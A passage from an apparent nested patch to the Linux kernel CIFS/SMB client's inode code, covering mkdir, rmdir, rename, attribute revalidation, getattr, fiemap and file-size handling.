++	if (rc != 0 && dosattr != 0)
++		cifs_set_file_info(inode, attrs, xid, full_path, origattr);
++
++out_reval:
++	if (inode) {
++		cifs_inode = CIFS_I(inode);
++		cifs_inode->time = 0;	/* will force revalidate to get info
++					   when needed */
++		inode->i_ctime = current_time(inode);
++	}
++	dir->i_ctime = dir->i_mtime = current_time(dir);
++	cifs_inode = CIFS_I(dir);
++	cifs_inode->time = 0;	/* force revalidate of dir as well */
++unlink_out:
++	free_dentry_path(page);
++	kfree(attrs);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
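++/*
++ * After a successful mkdir, query the new directory's metadata, apply
++ * the mode/ownership fixups dictated by the mount options and
++ * instantiate the dentry.
++ */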
++static int
++cifs_mkdir_qinfo(struct inode *parent, struct dentry *dentry, umode_t mode,
++		 const char *full_path, struct cifs_sb_info *cifs_sb,
++		 struct cifs_tcon *tcon, const unsigned int xid)
++{
++	int rc = 0;
++	struct inode *inode = NULL;
++
++	if (tcon->posix_extensions)
++		rc = smb311_posix_get_inode_info(&inode, full_path, parent->i_sb, xid);
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	else if (tcon->unix_ext)
++		rc = cifs_get_inode_info_unix(&inode, full_path, parent->i_sb,
++					      xid);
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	else
++		rc = cifs_get_inode_info(&inode, full_path, NULL, parent->i_sb,
++					 xid, NULL);
++
++	if (rc)
++		return rc;
++
++	if (!S_ISDIR(inode->i_mode)) {
++		/*
++		 * mkdir succeeded, but another client has managed to remove the
++		 * sucker and replace it with a non-directory. Return success,
++		 * but don't leave the child in dcache.
++		 */
++		iput(inode);
++		d_drop(dentry);
++		return 0;
++	}
++	/*
++	 * Setting nlink is not necessary except in cases where we failed to get
++	 * it from the server or it was set bogus. Also, since this is a brand new
++	 * inode, no need to grab the i_lock before setting the i_nlink.
++	 */
++	if (inode->i_nlink < 2)
++		set_nlink(inode, 2);
++	mode &= ~current_umask();
++	/* must turn on setgid bit if parent dir has it */
++	if (parent->i_mode & S_ISGID)
++		mode |= S_ISGID;
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (tcon->unix_ext) {
++		struct cifs_unix_set_info_args args = {
++			.mode	= mode,
++			.ctime	= NO_CHANGE_64,
++			.atime	= NO_CHANGE_64,
++			.mtime	= NO_CHANGE_64,
++			.device	= 0,
++		};
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
++			args.uid = current_fsuid();
++			if (parent->i_mode & S_ISGID)
++				args.gid = parent->i_gid;
++			else
++				args.gid = current_fsgid();
++		} else {
++			args.uid = INVALID_UID; /* no change */
++			args.gid = INVALID_GID; /* no change */
++		}
++		CIFSSMBUnixSetPathInfo(xid, tcon, full_path, &args,
++				       cifs_sb->local_nls,
++				       cifs_remap(cifs_sb));
++	} else {
++#else
++	{
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		struct TCP_Server_Info *server = tcon->ses->server;
++		if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) &&
++		    (mode & S_IWUGO) == 0 && server->ops->mkdir_setinfo)
++			server->ops->mkdir_setinfo(inode, full_path, cifs_sb,
++						   tcon, xid);
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)
++			inode->i_mode = (mode | S_IFDIR);
++
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
++			inode->i_uid = current_fsuid();
++			if (inode->i_mode & S_ISGID)
++				inode->i_gid = parent->i_gid;
++			else
++				inode->i_gid = current_fsgid();
++		}
++	}
++	d_instantiate(dentry, inode);
++	return 0;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static int
++cifs_posix_mkdir(struct inode *inode, struct dentry *dentry, umode_t mode,
++		 const char *full_path, struct cifs_sb_info *cifs_sb,
++		 struct cifs_tcon *tcon, const unsigned int xid)
++{
++	int rc = 0;
++	u32 oplock = 0;
++	FILE_UNIX_BASIC_INFO *info = NULL;
++	struct inode *newinode = NULL;
++	struct cifs_fattr fattr;
++
++	info = kzalloc(sizeof(FILE_UNIX_BASIC_INFO), GFP_KERNEL);
++	if (info == NULL) {
++		rc = -ENOMEM;
++		goto posix_mkdir_out;
++	}
++
++	mode &= ~current_umask();
++	rc = CIFSPOSIXCreate(xid, tcon, SMB_O_DIRECTORY | SMB_O_CREAT, mode,
++			     NULL /* netfid */, info, &oplock, full_path,
++			     cifs_sb->local_nls, cifs_remap(cifs_sb));
++	if (rc == -EOPNOTSUPP)
++		goto posix_mkdir_out;
++	else if (rc) {
++		cifs_dbg(FYI, "posix mkdir returned 0x%x\n", rc);
++		d_drop(dentry);
++		goto posix_mkdir_out;
++	}
++
++	if (info->Type == cpu_to_le32(-1))
++		/* no return info, go query for it */
++		goto posix_mkdir_get_info;
++	/*
++	 * BB check (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) to see if
++	 * we need to set uid/gid.
++	 */
++
++	cifs_unix_basic_to_fattr(&fattr, info, cifs_sb);
++	cifs_fill_uniqueid(inode->i_sb, &fattr);
++	newinode = cifs_iget(inode->i_sb, &fattr);
++	if (!newinode)
++		goto posix_mkdir_get_info;
++
++	d_instantiate(dentry, newinode);
++
++#ifdef CONFIG_CIFS_DEBUG2
++	cifs_dbg(FYI, "instantiated dentry %p %pd to inode %p\n",
++		 dentry, dentry, newinode);
++
++	if (newinode->i_nlink != 2)
++		cifs_dbg(FYI, "unexpected number of links %d\n",
++			 newinode->i_nlink);
++#endif
++
++posix_mkdir_out:
++	kfree(info);
++	return rc;
++posix_mkdir_get_info:
++	rc = cifs_mkdir_qinfo(inode, dentry, mode, full_path, cifs_sb, tcon,
++			      xid);
++	goto posix_mkdir_out;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++int cifs_mkdir(struct user_namespace *mnt_userns, struct inode *inode,
++	       struct dentry *direntry, umode_t mode)
++{
++	int rc = 0;
++	unsigned int xid;
++	struct cifs_sb_info *cifs_sb;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	const char *full_path;
++	void *page;
++
++	cifs_dbg(FYI, "In cifs_mkdir, mode = %04ho inode = 0x%p\n",
++		 mode, inode);
++
++	cifs_sb = CIFS_SB(inode->i_sb);
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	xid = get_xid();
++
++	page = alloc_dentry_path();
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto mkdir_out;
++	}
++
++	server = tcon->ses->server;
++
++	if ((server->ops->posix_mkdir) && (tcon->posix_extensions)) {
++		rc = server->ops->posix_mkdir(xid, inode, mode, tcon, full_path,
++					      cifs_sb);
++		d_drop(direntry); /* for the time being, always refresh inode info */
++		goto mkdir_out;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (cap_unix(tcon->ses) && (CIFS_UNIX_POSIX_PATH_OPS_CAP &
++				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
++		rc = cifs_posix_mkdir(inode, direntry, mode, full_path, cifs_sb,
++				      tcon, xid);
++		if (rc != -EOPNOTSUPP)
++			goto mkdir_out;
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	if (!server->ops->mkdir) {
++		rc = -ENOSYS;
++		goto mkdir_out;
++	}
++
++	/* BB add setting the equivalent of mode via CreateX w/ACLs */
++	rc = server->ops->mkdir(xid, inode, mode, tcon, full_path, cifs_sb);
++	if (rc) {
++		cifs_dbg(FYI, "cifs_mkdir returned 0x%x\n", rc);
++		d_drop(direntry);
++		goto mkdir_out;
++	}
++
++	/* TODO: skip this for smb2/smb3 */
++	rc = cifs_mkdir_qinfo(inode, direntry, mode, full_path, cifs_sb, tcon,
++			      xid);
++mkdir_out:
++	/*
++	 * Force revalidate to get parent dir info when needed since cached
++	 * attributes are invalid now.
++	 */
++	CIFS_I(inode)->time = 0;
++	free_dentry_path(page);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++int cifs_rmdir(struct inode *inode, struct dentry *direntry)
++{
++	int rc = 0;
++	unsigned int xid;
++	struct cifs_sb_info *cifs_sb;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	const char *full_path;
++	void *page = alloc_dentry_path();
++	struct cifsInodeInfo *cifsInode;
++
++	cifs_dbg(FYI, "cifs_rmdir, inode = 0x%p\n", inode);
++
++	xid = get_xid();
++
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto rmdir_exit;
++	}
++
++	cifs_sb = CIFS_SB(inode->i_sb);
++	if (unlikely(cifs_forced_shutdown(cifs_sb))) {
++		rc = -EIO;
++		goto rmdir_exit;
++	}
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink)) {
++		rc = PTR_ERR(tlink);
++		goto rmdir_exit;
++	}
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
++	if (!server->ops->rmdir) {
++		rc = -ENOSYS;
++		cifs_put_tlink(tlink);
++		goto rmdir_exit;
++	}
++
++	if (tcon->nodelete) {
++		rc = -EACCES;
++		cifs_put_tlink(tlink);
++		goto rmdir_exit;
++	}
++
++	rc = server->ops->rmdir(xid, tcon, full_path, cifs_sb);
++	cifs_put_tlink(tlink);
++
++	if (!rc) {
++		spin_lock(&d_inode(direntry)->i_lock);
++		i_size_write(d_inode(direntry), 0);
++		clear_nlink(d_inode(direntry));
++		spin_unlock(&d_inode(direntry)->i_lock);
++	}
++
++	cifsInode = CIFS_I(d_inode(direntry));
++	/* force revalidate to go get info when needed */
++	cifsInode->time = 0;
++
++	cifsInode = CIFS_I(inode);
++	/*
++	 * Force revalidate to get parent dir info when needed since cached
++	 * attributes are invalid now.
++	 */
++	cifsInode->time = 0;
++
++	d_inode(direntry)->i_ctime = inode->i_ctime = inode->i_mtime =
++		current_time(inode);
++
++rmdir_exit:
++	free_dentry_path(page);
++	free_xid(xid);
++	return rc;
++}
++
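++/*
++ * Try a path-based rename first; if the source is busy on an SMB1
++ * mount, fall back to renaming by open filehandle (same-directory
++ * moves only).
++ */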
++static int
++cifs_do_rename(const unsigned int xid, struct dentry *from_dentry,
++	       const char *from_path, struct dentry *to_dentry,
++	       const char *to_path)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(from_dentry->d_sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	int oplock;
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	int rc;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
++	if (!server->ops->rename)
++		return -ENOSYS;
++
++	/* try path-based rename first */
++	rc = server->ops->rename(xid, tcon, from_path, to_path, cifs_sb);
++
++	/*
++	 * Don't bother with rename by filehandle unless the busy file is the
++	 * source. Note that cross-directory moves do not work with
++	 * rename by filehandle against various Windows servers.
++	 */
++	if (rc == 0 || rc != -EBUSY)
++		goto do_rename_exit;
++
++	/* Don't fall back to using SMB on SMB 2+ mount */
++	if (server->vals->protocol_id != 0)
++		goto do_rename_exit;
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	/* open-file renames don't work across directories */
++	if (to_dentry->d_parent != from_dentry->d_parent)
++		goto do_rename_exit;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		/* open the file to be renamed -- we need DELETE perms */
++		.desired_access = DELETE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = from_path,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (rc == 0) {
++		rc = CIFSSMBRenameOpenFile(xid, tcon, fid.netfid,
++				(const char *) to_dentry->d_name.name,
++				cifs_sb->local_nls, cifs_remap(cifs_sb));
++		CIFSSMBClose(xid, tcon, fid.netfid);
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++do_rename_exit:
++	if (rc == 0)
++		d_move(from_dentry, to_dentry);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++int
++cifs_rename2(struct user_namespace *mnt_userns, struct inode *source_dir,
++	     struct dentry *source_dentry, struct inode *target_dir,
++	     struct dentry *target_dentry, unsigned int flags)
++{
++	const char *from_name, *to_name;
++	void *page1, *page2;
++	struct cifs_sb_info *cifs_sb;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	unsigned int xid;
++	int rc, tmprc;
++	int retry_count = 0;
++	FILE_UNIX_BASIC_INFO *info_buf_source = NULL;
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	FILE_UNIX_BASIC_INFO *info_buf_target;
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	if (flags & ~RENAME_NOREPLACE)
++		return -EINVAL;
++
++	cifs_sb = CIFS_SB(source_dir->i_sb);
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	page1 = alloc_dentry_path();
++	page2 = alloc_dentry_path();
++	xid = get_xid();
++
++	from_name = build_path_from_dentry(source_dentry, page1);
++	if (IS_ERR(from_name)) {
++		rc = PTR_ERR(from_name);
++		goto cifs_rename_exit;
++	}
++
++	to_name = build_path_from_dentry(target_dentry, page2);
++	if (IS_ERR(to_name)) {
++		rc = PTR_ERR(to_name);
++		goto cifs_rename_exit;
++	}
++
++	cifs_close_deferred_file_under_dentry(tcon, from_name);
++	if (d_inode(target_dentry) != NULL)
++		cifs_close_deferred_file_under_dentry(tcon, to_name);
++
++	rc = cifs_do_rename(xid, source_dentry, from_name, target_dentry,
++			    to_name);
++
++	if (rc == -EACCES) {
++		while (retry_count < 3) {
++			cifs_close_all_deferred_files(tcon);
++			rc = cifs_do_rename(xid, source_dentry, from_name, target_dentry,
++					    to_name);
++			if (rc != -EACCES)
++				break;
++			retry_count++;
++		}
++	}
++
++	/*
++	 * No-replace is the natural behavior for CIFS, so skip unlink hacks.
++	 */
++	if (flags & RENAME_NOREPLACE)
++		goto cifs_rename_exit;
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (rc == -EEXIST && tcon->unix_ext) {
++		/*
++		 * Are src and dst hardlinks of the same inode? We can only tell
++		 * with unix extensions enabled.
++		 */
++		info_buf_source =
++			kmalloc_array(2, sizeof(FILE_UNIX_BASIC_INFO),
++					GFP_KERNEL);
++		if (info_buf_source == NULL) {
++			rc = -ENOMEM;
++			goto cifs_rename_exit;
++		}
++
++		info_buf_target = info_buf_source + 1;
++		tmprc = CIFSSMBUnixQPathInfo(xid, tcon, from_name,
++					     info_buf_source,
++					     cifs_sb->local_nls,
++					     cifs_remap(cifs_sb));
++		if (tmprc != 0)
++			goto unlink_target;
++
++		tmprc = CIFSSMBUnixQPathInfo(xid, tcon, to_name,
++					     info_buf_target,
++					     cifs_sb->local_nls,
++					     cifs_remap(cifs_sb));
++
++		if (tmprc == 0 && (info_buf_source->UniqueId ==
++				   info_buf_target->UniqueId)) {
++			/* same file, POSIX says that this is a noop */
++			rc = 0;
++			goto cifs_rename_exit;
++		}
++	}
++	/*
++	 * else ... BB we could add the same check for Windows by
++	 * checking the UniqueId via FILE_INTERNAL_INFO
++	 */
++
++unlink_target:
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	/* Try unlinking the target dentry if it's not negative */
++	if (d_really_is_positive(target_dentry) && (rc == -EACCES || rc == -EEXIST)) {
++		if (d_is_dir(target_dentry))
++			tmprc = cifs_rmdir(target_dir, target_dentry);
++		else
++			tmprc = cifs_unlink(target_dir, target_dentry);
++		if (tmprc)
++			goto cifs_rename_exit;
++		rc = cifs_do_rename(xid, source_dentry, from_name,
++				    target_dentry, to_name);
++	}
++
++	/* force revalidate to go get info when needed */
++	CIFS_I(source_dir)->time = CIFS_I(target_dir)->time = 0;
++
++	source_dir->i_ctime = source_dir->i_mtime = target_dir->i_ctime =
++		target_dir->i_mtime = current_time(source_dir);
++
++cifs_rename_exit:
++	kfree(info_buf_source);
++	free_dentry_path(page2);
++	free_dentry_path(page1);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
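++/*
++ * Decide whether a dentry's cached attributes must be refetched from
++ * the server, honouring lease state, any cached directory lease and the
++ * actimeo (acregmax/acdirmax) timeouts.
++ */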
++static bool
++cifs_dentry_needs_reval(struct dentry *dentry)
++{
++	struct inode *inode = d_inode(dentry);
++	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	struct cached_fid *cfid = NULL;
++
++	if (cifs_i->time == 0)
++		return true;
++
++	if (CIFS_CACHE_READ(cifs_i))
++		return false;
++
++	if (!lookupCacheEnabled)
++		return true;
++
++	if (!open_cached_dir_by_dentry(tcon, dentry->d_parent, &cfid)) {
++		spin_lock(&cfid->fid_lock);
++		if (cfid->time && cifs_i->time > cfid->time) {
++			spin_unlock(&cfid->fid_lock);
++			close_cached_dir(cfid);
++			return false;
++		}
++		spin_unlock(&cfid->fid_lock);
++		close_cached_dir(cfid);
++	}
++	/*
++	 * Depending on the inode type, check whether attribute caching is
++	 * disabled for files or directories.
++	 */
++	if (S_ISDIR(inode->i_mode)) {
++		if (!cifs_sb->ctx->acdirmax)
++			return true;
++		if (!time_in_range(jiffies, cifs_i->time,
++				   cifs_i->time + cifs_sb->ctx->acdirmax))
++			return true;
++	} else { /* file */
++		if (!cifs_sb->ctx->acregmax)
++			return true;
++		if (!time_in_range(jiffies, cifs_i->time,
++				   cifs_i->time + cifs_sb->ctx->acregmax))
++			return true;
++	}
++
++	/* hardlinked files w/ noserverino get "special" treatment */
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) &&
++	    S_ISREG(inode->i_mode) && inode->i_nlink != 1)
++		return true;
++
++	return false;
++}
++
++/*
++ * Zap the cache. Called when invalid_mapping flag is set.
++ */
++int
++cifs_invalidate_mapping(struct inode *inode)
++{
++	int rc = 0;
++
++	if (inode->i_mapping && inode->i_mapping->nrpages != 0) {
++		rc = invalidate_inode_pages2(inode->i_mapping);
++		if (rc)
++			cifs_dbg(VFS, "%s: Could not invalidate inode %p\n",
++				 __func__, inode);
++	}
++
++	return rc;
++}
++
++/**
++ * cifs_wait_bit_killable - helper for functions that are sleeping on bit locks
++ *
++ * @key:	currently unused
++ * @mode:	the task state to sleep in
++ */
++static int
++cifs_wait_bit_killable(struct wait_bit_key *key, int mode)
++{
++	schedule();
++	if (signal_pending_state(mode, current))
++		return -ERESTARTSYS;
++	return 0;
++}
++
++int
++cifs_revalidate_mapping(struct inode *inode)
++{
++	int rc;
++	unsigned long *flags = &CIFS_I(inode)->flags;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++
++	/* swapfiles are not supposed to be shared */
++	if (IS_SWAPFILE(inode))
++		return 0;
++
++	rc = wait_on_bit_lock_action(flags, CIFS_INO_LOCK, cifs_wait_bit_killable,
++				     TASK_KILLABLE|TASK_FREEZABLE_UNSAFE);
++	if (rc)
++		return rc;
++
++	if (test_and_clear_bit(CIFS_INO_INVALID_MAPPING, flags)) {
++		/* for cache=singleclient, do not invalidate */
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RW_CACHE)
++			goto skip_invalidate;
++
++		rc = cifs_invalidate_mapping(inode);
++		if (rc)
++			set_bit(CIFS_INO_INVALID_MAPPING, flags);
++	}
++
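++	/* release the CIFS_INO_LOCK bit lock taken above and wake any
++	 * tasks sleeping on it in cifs_wait_bit_killable() */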
++skip_invalidate:
++	clear_bit_unlock(CIFS_INO_LOCK, flags);
++	smp_mb__after_atomic();
++	wake_up_bit(flags, CIFS_INO_LOCK);
++
++	return rc;
++}
++
++int
++cifs_zap_mapping(struct inode *inode)
++{
++	set_bit(CIFS_INO_INVALID_MAPPING, &CIFS_I(inode)->flags);
++	return cifs_revalidate_mapping(inode);
++}
++
++int cifs_revalidate_file_attr(struct file *filp)
++{
++	int rc = 0;
++	struct dentry *dentry = file_dentry(filp);
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	struct cifsFileInfo *cfile = (struct cifsFileInfo *) filp->private_data;
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	if (!cifs_dentry_needs_reval(dentry))
++		return rc;
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (tlink_tcon(cfile->tlink)->unix_ext)
++		rc = cifs_get_file_info_unix(filp);
++	else
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		rc = cifs_get_file_info(filp);
++
++	return rc;
++}
++
++int cifs_revalidate_dentry_attr(struct dentry *dentry)
++{
++	unsigned int xid;
++	int rc = 0;
++	struct inode *inode = d_inode(dentry);
++	struct super_block *sb = dentry->d_sb;
++	const char *full_path;
++	void *page;
++	int count = 0;
++
++	if (inode == NULL)
++		return -ENOENT;
++
++	if (!cifs_dentry_needs_reval(dentry))
++		return rc;
++
++	xid = get_xid();
++
++	page = alloc_dentry_path();
++	full_path = build_path_from_dentry(dentry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto out;
++	}
++
++	cifs_dbg(FYI, "Update attributes: %s inode 0x%p count %d dentry: 0x%p d_time %ld jiffies %ld\n",
++		 full_path, inode, inode->i_count.counter,
++		 dentry, cifs_get_time(dentry), jiffies);
++
++again:
++	if (cifs_sb_master_tcon(CIFS_SB(sb))->posix_extensions)
++		rc = smb311_posix_get_inode_info(&inode, full_path, sb, xid);
++	else if (cifs_sb_master_tcon(CIFS_SB(sb))->unix_ext)
++		rc = cifs_get_inode_info_unix(&inode, full_path, sb, xid);
++	else
++		rc = cifs_get_inode_info(&inode, full_path, NULL, sb,
++					 xid, NULL);
++	if (rc == -EAGAIN && count++ < 10)
++		goto again;
++out:
++	free_dentry_path(page);
++	free_xid(xid);
++
++	return rc;
++}
++
++int cifs_revalidate_file(struct file *filp)
++{
++	int rc;
++	struct inode *inode = file_inode(filp);
++
++	rc = cifs_revalidate_file_attr(filp);
++	if (rc)
++		return rc;
++
++	return cifs_revalidate_mapping(inode);
++}
++
++/* revalidate a dentry's inode attributes */
++int cifs_revalidate_dentry(struct dentry *dentry)
++{
++	int rc;
++	struct inode *inode = d_inode(dentry);
++
++	rc = cifs_revalidate_dentry_attr(dentry);
++	if (rc)
++		return rc;
++
++	return cifs_revalidate_mapping(inode);
++}
++
++int cifs_getattr(struct user_namespace *mnt_userns, const struct path *path,
++		 struct kstat *stat, u32 request_mask, unsigned int flags)
++{
++	struct dentry *dentry = path->dentry;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(dentry->d_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	struct inode *inode = d_inode(dentry);
++	int rc;
++
++	if (unlikely(cifs_forced_shutdown(CIFS_SB(inode->i_sb))))
++		return -EIO;
++
++	/*
++	 * We need to be sure that all dirty pages are written and the server
++	 * has the actual ctime, mtime and file length.
++	 */
++	if ((request_mask & (STATX_CTIME | STATX_MTIME | STATX_SIZE | STATX_BLOCKS)) &&
++	    !CIFS_CACHE_READ(CIFS_I(inode)) &&
++	    inode->i_mapping && inode->i_mapping->nrpages != 0) {
++		rc = filemap_fdatawait(inode->i_mapping);
++		if (rc) {
++			mapping_set_error(inode->i_mapping, rc);
++			return rc;
++		}
++	}
++
++	if ((flags & AT_STATX_SYNC_TYPE) == AT_STATX_FORCE_SYNC)
++		CIFS_I(inode)->time = 0; /* force revalidate */
++
++	/*
++	 * If the caller doesn't require syncing, only sync if
++	 * necessary (e.g. due to earlier truncate or setattr
++	 * invalidating the cached metadata)
++	 */
++	if (((flags & AT_STATX_SYNC_TYPE) != AT_STATX_DONT_SYNC) ||
++	    (CIFS_I(inode)->time == 0)) {
++		rc = cifs_revalidate_dentry_attr(dentry);
++		if (rc)
++			return rc;
++	}
++
++	generic_fillattr(&init_user_ns, inode, stat);
++	stat->blksize = cifs_sb->ctx->bsize;
++	stat->ino = CIFS_I(inode)->uniqueid;
++
++	/* the old CIFS Unix Extensions don't return a create time */
++	if (CIFS_I(inode)->createtime) {
++		stat->result_mask |= STATX_BTIME;
++		stat->btime =
++		      cifs_NTtimeToUnix(cpu_to_le64(CIFS_I(inode)->createtime));
++	}
++
++	stat->attributes_mask |= (STATX_ATTR_COMPRESSED | STATX_ATTR_ENCRYPTED);
++	if (CIFS_I(inode)->cifsAttrs & FILE_ATTRIBUTE_COMPRESSED)
++		stat->attributes |= STATX_ATTR_COMPRESSED;
++	if (CIFS_I(inode)->cifsAttrs & FILE_ATTRIBUTE_ENCRYPTED)
++		stat->attributes |= STATX_ATTR_ENCRYPTED;
++
++	/*
++	 * If on a multiuser mount without unix extensions or cifsacl being
++	 * enabled, and the admin hasn't overridden them, set the ownership
++	 * to the fsuid/fsgid of the current process.
++	 */
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER) &&
++	    !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) &&
++	    !tcon->unix_ext) {
++		if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_UID))
++			stat->uid = current_fsuid();
++		if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_GID))
++			stat->gid = current_fsgid();
++	}
++	return 0;
++}
++
++int cifs_fiemap(struct inode *inode, struct fiemap_extent_info *fei, u64 start,
++		u64 len)
++{
++	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(cifs_i->netfs.inode.i_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	struct cifsFileInfo *cfile;
++	int rc;
++
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	/*
++	 * We need to be sure that all dirty pages are written as they
++	 * might fill holes on the server.
++	 */
++	if (!CIFS_CACHE_READ(CIFS_I(inode)) && inode->i_mapping &&
++	    inode->i_mapping->nrpages != 0) {
++		rc = filemap_fdatawait(inode->i_mapping);
++		if (rc) {
++			mapping_set_error(inode->i_mapping, rc);
++			return rc;
++		}
++	}
++
++	cfile = find_readable_file(cifs_i, false);
++	if (cfile == NULL)
++		return -EINVAL;
++
++	if (server->ops->fiemap) {
++		rc = server->ops->fiemap(tcon, cfile, fei, start, len);
++		cifsFileInfo_put(cfile);
++		return rc;
++	}
++
++	cifsFileInfo_put(cfile);
++	return -ENOTSUPP;
++}
++
++int cifs_truncate_page(struct address_space *mapping, loff_t from)
++{
++	pgoff_t index = from >> PAGE_SHIFT;
++	unsigned offset = from & (PAGE_SIZE - 1);
++	struct page *page;
++	int rc = 0;
++
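++	/* e.g. from = 5000 with 4K pages: index = 1, offset = 904, so
++	 * bytes 904..4095 of that page are zeroed below */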
++	page = grab_cache_page(mapping, index);
++	if (!page)
++		return -ENOMEM;
++
++	zero_user_segment(page, offset, PAGE_SIZE);
++	unlock_page(page);
++	put_page(page);
++	return rc;
++}
++
++void cifs_setsize(struct inode *inode, loff_t offset)
++{
++	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
++
++	spin_lock(&inode->i_lock);
++	i_size_write(inode, offset);
++	spin_unlock(&inode->i_lock);
++
++	/* Cached inode must be refreshed on truncate */
++	cifs_i->time = 0;
++	truncate_pagecache(inode, offset);
++}
++
++static int
++cifs_set_file_size(struct inode *inode, struct iattr *attrs,
++		   unsigned int xid, const char *full_path)
++{
++	int rc;
++	struct cifsFileInfo *open_file;
++	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink = NULL;
++	struct cifs_tcon *tcon = NULL;
++	struct TCP_Server_Info *server;
++
++	/*
++	 * To avoid spurious oplock breaks from the server, in the case of
++	 * inodes that we already have open, avoid doing path-based
++	 * setting of the file size if we can do it by handle.
++	 * This keeps our caching token (oplock) and avoids timeouts
++	 * when the local oplock break takes longer to flush
++	 * writebehind data than the SMB timeout for the SetPathInfo
++	 * request would allow.
++	 */
++	open_file = find_writable_file(cifsInode, FIND_WR_FSUID_ONLY);
++	if (open_file) {
++		tcon = tlink_tcon(open_file->tlink);
++		server = tcon->ses->server;
++		if (server->ops->set_file_size)
++			rc = server->ops->set_file_size(xid, tcon, open_file,
++							attrs->ia_size, false);
++		else
++			rc = -ENOSYS;
++		cifsFileInfo_put(open_file);
++		cifs_dbg(FYI, "SetFSize for attrs rc = %d\n", rc);
++	} else
++		rc = -EINVAL;
++
++	if (!rc)
++		goto set_size_out;
++
